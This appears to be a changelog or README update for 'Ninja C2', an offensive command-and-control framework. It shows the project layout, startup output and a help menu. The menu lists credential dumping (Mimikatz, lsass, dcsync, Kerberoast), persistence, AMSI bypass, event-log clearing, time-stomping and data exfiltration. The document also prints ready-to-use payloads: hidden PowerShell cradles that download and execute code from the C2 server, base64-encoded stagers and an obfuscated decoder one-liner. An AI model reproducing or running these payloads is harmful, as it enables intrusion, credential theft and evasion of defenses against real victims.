Many changes..

[zAbuQasem]

Managed file structure

• Now every campaign have a specific file.
• Payloads are sorted in folders
• lib, agents now in core/ folder

  
  Ninja|master⚡ ⇒ tree
  .
  ├── abuqasem-campaign
  │   ├── DA
  │   ├── downloads
  │   ├── file
  │   ├── images
  │   └── kerberoast
  ├── core
  │   ├── agents
  │   │   ├── cmd_shellcodex64.ninja
  │   │   ├── cmd_shellcodex86.ninja
  │   │   ├── download.ninja
  │   │   ├── Excel_macro.ninja
  │   │   ├── Migrator.ninja
  │   │   ├── payload2.ps1
  │   │   ├── screenshot.ninja
  │   │   ├── simple_dropper.ninja
  │   │   ├── stager.ps1
  │   │   ├── upload.ninja
  │   │   ├── webshell.ninja
  │   │   └── word_macro.ninja
  │   ├── cmd.py
  │   ├── color.py
  │   ├── config.py
  │   ├── config.template
  │   ├── DA.py
  │   ├── Encryption.py
  │   ├── Kerberoast.py
  │   ├── lib
  │   │   ├── obf.list
  │   │   ├── prettytable.py
  │   │   └── System.Management.Automation.dll
  │   ├── Obfuscate.py
  │   ├── payloads.py
  │   ├── webserver.py
  │   └── webshell.py
  ├── install.sh
  ├── logs
  │   └── c2-logs.txt
  ├── Modules
  │   ├── AMSI_Bypass.ps1
  │   ├── ASBBypass.ps1
  │   ├── DA.ps1
  │   ├── Find-PSServiceAccounts.ps1
  │   ├── Invoke-Kerberoast.ps1
  │   ├── Invoke-Mimikatz-old.ps1
  │   ├── Invoke-Mimikatz.ps1
  │   ├── Invoke-WMIExec.ps1
  │   ├── kerb.ps1
  │   ├── Migrator.ps1
  │   ├── PowerView.ps1
  │   ├── safetydump.ninja
  │   ├── SharpHound.ps1
  │   └── split.ps1
  ├── Ninja.py
  ├── README.md
  ├── requirements.txt
  ├── screenshots
  │   ├── da.png
  │   ├── download.png
  │   ├── groups.png
  │   ├── list.png
  │   ├── main.png
  │   ├── payload.png
  │   ├── pc.png
  │   ├── shares.png
  │   └── upload.png
  ├── start_campaign.py
  └── utils
  ├── Certificate
  │   ├── ninja.crt
  │   └── ninja.key
  ├── links.txt
  └── payloads
      ├── Executables
      │   ├── cs_dropper.cs
      │   ├── dropper_cs.dll
      │   └── dropper_cs.exe
      ├── Macros
      │   ├── Excel_macro.vba
      │   └── Word_macro.vba
      ├── Powershell
      │   ├── base64_stager.ps1
      │   ├── payload-obf.ps1
      │   └── raw_payload.ps1
      ├── shellcodes
      │   ├── cmd_shellcodex64
      │   ├── cmd_shellcodex64.asm
      │   ├── cmd_shellcodex64.bin
      │   ├── cmd_shellcodex86
      │   ├── cmd_shellcodex86.asm
      │   ├── cmd_shellcodex86.bin
      │   └── donut_shellcode.b64
      └── Webserver

20 directories, 73 files

# Ninja c2
- No more verbose display of payloads
```bash
Ninja|master⚡ ⇒ python3 Ninja.py

    ███╗   ██╗██╗███╗   ██╗     ██╗ █████╗      ██████╗██████╗ 
    ████╗  ██║██║████╗  ██║     ██║██╔══██╗    ██╔════╝╚════██╗
    ██╔██╗ ██║██║██╔██╗ ██║     ██║███████║    ██║      █████╔╝
    ██║╚██╗██║██║██║╚██╗██║██   ██║██╔══██║    ██║     ██╔═══╝ 
    ██║ ╚████║██║██║ ╚████║╚█████╔╝██║  ██║    ╚██████╗███████╗
    ╚═╝  ╚═══╝╚═╝╚═╝  ╚═══╝ ╚════╝ ╚═╝  ╚═╝     ╚═════╝╚══════╝ 
                                                            Version: 2.0
[-] Ninja C2 | Stealthy Pwn like a Ninja

[-] Starting WebServer..
 * Serving Flask app 'core.webserver' (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off

[-] Creating Payloads..
[05:17:55] [+] Raw Payload written to: utils/payloads/Powershell/raw_payload.ps1                                   config.py:67
           [+] Obfuscated payload written to: utils/payloads/Powershell/payload-obf.ps1                           config.py:124
           [+] Stager Payload written to: utils/payloads/Powershell/base64_stager.ps1                              config.py:83
           [+] C# Dropper DLL written to: utils/payloads/Executables/dropper_cs.dll                               config.py:103
           [+] C# Dropper EXE written to: utils/payloads/Executables/dropper_cs.exe                               config.py:108
[05:17:55] [+] Created HTA-Payload                                                                               payloads.py:21
           [+] Created Powershell Start-Job & Start-Process                                                      payloads.py:42
           [+] Created Powershell File                                                                           payloads.py:59
           [+] Created Powershell SCT                                                                            payloads.py:76
           [+] Created Simple Powershell Payloads                                                               payloads.py:101
           [+] Created Powershell Base64                                                                        payloads.py:123
           [+] Created Powershell Base52                                                                        payloads.py:149
           [+] Cmd Shellcodex86 written to:  utils/payloads/shellcodes/cmd_shellcodex86                         payloads.py:198
           [+] Cmd Shellcodex64 written to:  utils/payloads/shellcodes/cmd_shellcodex64                         payloads.py:172
           [+] Word Macro written to:  utils/payloads/Macros/Word_macro.vba                                     payloads.py:227
           [+] Excel Macro written to:  utils/payloads/Macros/Excel_macro.vba                                   payloads.py:241
           [+] Donut Shellcode written to:  utils/payloads/shellcodes/donut_shellcode.b64                       payloads.py:210
           [+] Migrator payload written to: Modules/Migrator.ps1                                                  config.py:145

[-] Loading registered webshell list
[!] Webshell list file doesn't exist.

(Ninja:main)> 

• reset instead of clear to avoid clearing by mistake
• Nicer help menu?

  
  (Ninja:main)> help

[-] Ninja management

help: Help menu reset: Clear screen back: Back to the main exit: Exit the console , or kill the agent load: load modules modules: list all the Available modules in Modules directory payload: Show Payloads downloads: list downloaded files

[-] Agents management

list: List all agents use: Interact with AGENT kill_all: kill all agents delete: delete agent from the list delete_all: delete all agents in the list set_beacon: set the beacon interval live for agent upload: upload files to the victim download: download file from the victim screenshot: take screenshot from victim machine split: split file to small size files for data exfiltration (use join command for files in current server or use join.ps1 script to join data on windows ) join: join splited file names ( include the original file name in the path and the script will know the file parts)

[-] Enumeration Commands

get_groups: get all the groups user is member of get_users: get all the users member in group processlist: list processes formatted ( Name , ID , Commandline) kerb: do kerberoast attack and dump service accounts hashes dcsync_all: do dcsync attack and get all users hashes dcsync_admins: do dcsync attack against admin users dumpcreds: load mimikatz and dump credentials dcsync_list: do dcsync attack against custom user list bloodhound: run bloodhound to collect all the information about the AD DA: Run defense Analysis Module gen_ntlm: generate ntlm hash for given password lsass_memory_dump: dump lsass memory without touching the disk then parse it and provide credentials

[-] Miscellaneous

encode64: encode any command to base64 encoded UTF-8 command ( can be decoded in powershell) drm: disable windows realtime monitoring - require admin privileges unmanged_powershell: run powershell payload through the dotnet agent persist_schtasks: persistence using schedule tasks migrate: migrate to new process ( default nslookup ) to hide the backdoor , this command will only work if you enabled donut in campaign creation webshell_mode: enter webshell mode to register and control your shells) register_webshell: register webshell to be controlled : register_webshell time_stomp: change the ( access , modify , creation ) time of destination file as same as the source file ) . Usage time_stomp < source path > < destination path > clear_all_logs: this command will clear all windows event logs in the system

- Nicer way of displaying payloads
```bash
(Ninja:main)> payload

[-] HTA-Payloads
-> mshta https://127.0.0.1:8080/disco
-> powershell -c "mshta https://127.0.0.1:8080/disco"

[-] Powershell Job
-> Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3R
lbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvc2VydmljZScpO0lFWCgkcyk=')))}

[-] Powershell Process
-> Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWV
zdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvc2VydmljZScpO
0lFWCgkcyk=')))" -WindowStyle Hidden

[-] Powershell File
-> iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJ
veHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvb3BlcmF0aW9ucycpO0lFWCgkcyk=')))

[-] Powershell SCT
-> iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJ
veHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vMTI3LjAuMC4xOjgwODAvcnNzJyk7SUVYKCRzKQ==')))

[-] Powershell Misc
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/service');"

[-] Powershell Base64
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/services');"

[-] Powershell Base54
-> powershell -w hidden "$h = (New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');Invoke-Expression $h;"
-> powershell -w hidden "IEX(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');"
-> powershell -w hidden "Invoke-Expression(New-Object Net.WebClient).DownloadString('https://127.0.0.1:8080/webserviceclient');"
-> powershell -w hidden $s=(new-object net.webclient).DownloadString('https://127.0.0.1:8080/uddigui');$d = @();$v = 0;$c = 0;while($c -ne 
$s.length){$v=($v*52)+([Int32]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};::Reverse($d);iex([String]::Join('',$d));